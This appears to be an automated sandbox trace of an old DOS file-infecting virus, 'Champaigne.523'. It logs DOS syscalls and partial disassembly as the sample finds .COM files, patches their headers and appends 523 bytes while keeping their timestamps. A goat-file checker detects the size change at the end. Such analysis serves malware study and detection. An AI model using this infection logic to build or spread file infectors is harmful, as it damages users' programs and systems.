
vx.netlux.org/Virus.DOS.Champaigne.523



Syscalls:

Time | Syscall Op | Syscall Name
2018-12-17T22:20:53.510935429Z 42 PC: 140f8 | Get date
0x140f8: mov byte ptr ds:[bp + 0x2c5], dl
0x140fd: mov byte ptr ds:[bp + 0x2c4], dh
0x14102: mov byte ptr ds:[bp + 0x2c3], al
0x14107: cmp al, 0
0x14109: je 0x14115
0x1410b: mov di, 0x100
0x1410e: lea si, word ptr [bp + 0x28b]
0x14112: push di
0x14113: movsw word ptr es:[di], word ptr [si]
0x14114: movsw word ptr es:[di], word ptr [si]
0x14115: lea dx, word ptr [bp + 0x2e5]
0x14119: call 0x1421c
0x1411c: jmp 0x14207
0x1411f: cmp byte ptr ds:[bp + 0x2c5], 0x18
0x14125: jne 0x14132
0x14127: call 0x14159
0x1412a: cmp byte ptr ds:[bp + 0x2c4], 6
0x14130: je 0x14150
0x14132: mov dx, 0x80
0x14135: call 0x1421c
2018-12-17T22:20:53.514087972Z 26 PC: 14220 | Set disk transfer address
2018-12-17T22:20:53.515358158Z 78 PC: 14212 | Find first file
2018-12-17T22:20:53.521401362Z 61 PC: 14177 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:20:53.529372889Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.53098872Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.543809095Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.546078235Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.548345363Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.557713592Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.559576819Z 44 PC: 141bd | Get time
0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.562781067Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.576762579Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.578988422Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.587792505Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.590694671Z 61 PC: 14177 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:20:53.597426383Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.599791201Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.606399563Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.608151639Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.616138883Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.618897846Z 61 PC: 14177 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:20:53.626156557Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.628312725Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.634805714Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.636176916Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.638177572Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.641050388Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.642667333Z 44 PC: 141bd | Get time
0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.646264198Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.654418532Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.656197483Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.664686986Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.669384884Z 61 PC: 14177 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:20:53.67572049Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.677192777Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.683899125Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.685673182Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.693616894Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.697129764Z 61 PC: 14177 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:20:53.703801486Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.705443757Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.712300427Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.713944713Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.721009931Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.724236232Z 61 PC: 14177 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:20:53.730881109Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.732470368Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.739505671Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.741182448Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.74280247Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.746636613Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.748296067Z 44 PC: 141bd | Get time
0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.750899074Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.760127881Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.761896186Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.769592208Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.772894786Z 61 PC: 14177 | Open file (Filename = 'PAH.COM')
2018-12-17T22:20:53.779534405Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.781087068Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.788180047Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.789641162Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.797309736Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.800719287Z 61 PC: 14177 | Open file (Filename = 'TEST.COM')
2018-12-17T22:20:53.80776619Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.809620868Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.813189821Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.815186565Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.82490191Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.829510218Z 26 PC: 14220 | Set disk transfer address
2018-12-17T22:20:53.831104088Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:20:53.832494724Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:20:53.842899496Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:20:53.850080686Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:20:53.852676686Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:20:53.855332498Z 9 PC: 12b03 | Display string (String= 'Size change=+020Bh/00523d. Virus might be activ? ')
2018-12-17T22:20:53.860894152Z 76 PC: 12b09 | Terminate with return code (Return code = '1')